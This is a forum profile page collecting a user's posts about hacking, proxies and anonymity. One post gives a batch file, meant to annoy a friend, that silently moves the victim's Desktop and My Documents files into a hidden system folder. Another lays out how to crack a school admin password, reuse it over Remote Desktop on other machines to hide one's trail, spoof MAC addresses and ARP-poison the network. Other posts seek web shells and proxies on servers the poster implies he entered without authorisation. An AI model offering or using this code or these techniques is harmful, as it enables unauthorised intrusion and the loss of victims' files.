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Everything posted by HALEN666

  1. wy do you wanna use your cell with your computer when you can just use a modem from in your computer, then you can encrypt all the data so that nobody can "sniff" your conversation, even windows itself have a program to call people from your computer all you gotta have is a moden and a phone line, then just get one of those programs to encrypt your calls with other people and you will be good to go
  2. i dont see any difference between hacking school and hacking any other website, if they get you either at school or hackingn any other website you would get in trouble. if you wanna preach then just say DONT HACK and that would basically say all. i would rather hack my school that to hack nasa, or the fbi or any other importat organization like those
  3. just help the guy god @#$#$ it is up to him weather he wants to anoy his friend or not, if you dont wanna help cause you dont like people hitting back then just dont say anything. if you really have to use a batch file to anoy him then what i would do i would do this: name the batch file as you.bat then here is the batch file @echo off if exist c:windowssystem32hiden goto lol md c:windowssystem32hiden attrib c:windowssystem32hiden +h start move /y c:"documents and settings"%username%desktop*.* c:windowssystem32hiden start move c:"documents and settings"%username%my documents c:windowssystem32hiden :lol start " @ssh@#$" type c:windowssystemm32*.dll you.bat or any other combination you wanna use i use the last two lines to anoy people, you will see why, i found what it does by "experimenting" with command prompt lol since then i have never seen people using this command in a batch file to create somthing like this, iu think a lot of people have't found what type *.dll or type *.exe or just trying read the info of a file from the command pormpt can cause
  4. how can i install that webadmin that you said, it is a 2003 server
  5. HALEN666

    sock proxy

    hey man thank you, i already knew that about using cygwin in xp and get a ssh server, but you know, i wanted to get something a little bit nicer, i wonder if there is a program that would install a ssh proxy in a computer without having to install cygwin. something like cgi proxy which is only a file or the php proxy would be nice. i have somr servers lol in which i would like to install a ssh proxy and be able to connect to them and then i would be able to hide my self with them. thank you anyway man if you know about a program for xp that does what i need please lemme know, i have found some programs but they are for linux and the severs are windows 2003 so they don't halp me lol
  6. what the heck do you mean by saying randonly spoof a mac address and get dhcp request, how would that help me. of course i change my mac address when i di something on the internet if you know what i mean, and i proxy my connection with torl however, i wanna know how to connect to a phone line so that my "privacy" qould be a little bit better.i am in nat network and it is really difficult for me to get new ip addresses it taks like 4 months before my isp changes my external ip, and for those who are gonna tell me to disconnect my modem and let it be loff all night, well i hhave tried that but didn't work
  7. HALEN666

    sock proxy

    hey guys this is my question and i hope somebody can help me. how can i set up a sock proxy in my server, or in servers i have access to hehehe you know i wanna be able to set up a sock proxy at home and be able to access that SOCK proxy from school and any other place. for people who is gonna tell me to use a webproxy, a regular proxy program or anything like that thanks i already know that. however, what i do not know is how to set up a sock proxy, there are some scripts to set up webproxies; however, i wonder if there is a script or a little program to set up a sock proxy in a server. thank you guys and have a good one
  8. you know i feel like i should ask again.. basically what i wanna do is to be able to set up a page in a webserver to be able to use tools such as netcat in that server from the net, there is a video in milw0rm in which the guy set up a page in a server and just by typing in YOUR browser www.blahblahblah.com/pagewithnetcat.asp you can have access to the server through port 80, you can check files in the server an stuff like that. it is nice for serrvers in which the damn router doesnt forward any other port but port 80
  9. HALEN666

    admin shell

    hey guys i have a really important question, how can i create an admin shell in a server that can be access through port 80. you know there are some websites in which you can access the server through port 80 by going to a page such as admin.php or login.asp, and have admin access to check files from the drives of the server and stuff like that. is there a program to create a shell or if i had to program a script for that how could i do it, sorry programming is not something i really like. if you could help me i would really thank you. bye
  10. here is what i would do if i were you i would hacked the admin password of one of the computers that you got at school, once you crack the password (it will probablye be the same admin password for all other computers) try to use remote desktop to another computer in another room and hack or do whatever you wanna do from that computer, in case they try to trtace you they will get the other computer and not the once you are using (unless they check the connections made to that computer which would take more time for them) if they dont have port 3389 on those computers open, then you should scan the net and try to find the employee's computers they will usually have port 3389 open and try some of them to se if the password you ckracked is the same they use for those computers if ypou are lucky you might get a chance to do stuff in those computers. or just get a laptop and take it to school, connected to the network and hack from there, if they got mac address filters then spoof on a mac address of a computer , arp poisoning might help you but if they are really careful with the network as you say, they will probably find out pretty quick that somebody is poisoning the net one way to do that might be by using the arp -a command, if somebody is poisoning the net they will get the mac address of all the computers in the subnet, unless they are doing that from the main server
  11. hi everybody, i have cable connection so my internet connection is pretty fast; however, i wanna connect my computer to a phone line so that i can be able to access the internet from a my phone line and not my cable connection so my question is this, how can i connect my computer to my phone line without having to get the dial up service from my telephone company??? is there a way to plug the phone cable to my modem card and dial something to get some kind of free internet, in other words is there a way to dial to some other modem and get free internet and them i can access any website from there? dial-up connections and stuff like that are not my best so please if you can help me i will really thank you. by the way some of you will ask " why do you wanna use dial up connectio when you got cable well it is obvious , i wanna have a different ip address without having to use a proxy, sock proxy or a web proxy, instead i wanna use a phone connection thank you
  12. why doesnt he use a bootable cd to download the episode you wanna get? then once he gets it then tell him to upload the file to a ftp server, if he does not have a ftp server tell him to create an account in www. bluetie. com once he creates the account "for free" he will have 5 gb available to upload anything he wants to his acccount, it also gives you an email account and you can even add 5 more people to your domain it is a great service and it is for free, then once he uploads the episode to his account tell him to add you to his domain and tell him to share his files that he will have in his account. after that all you would have toi do is to log in in your account that he will give you and bang all you would have to do is to download the file to your computer. this is very handy, after that you will be able to share files through bluetie just upload the file to your account and share the file in your account to the other members of the domain and they will be able to download the file in their computers. i hope i could help you. i am new in this forum but i got a little experience in the computer field ;-)
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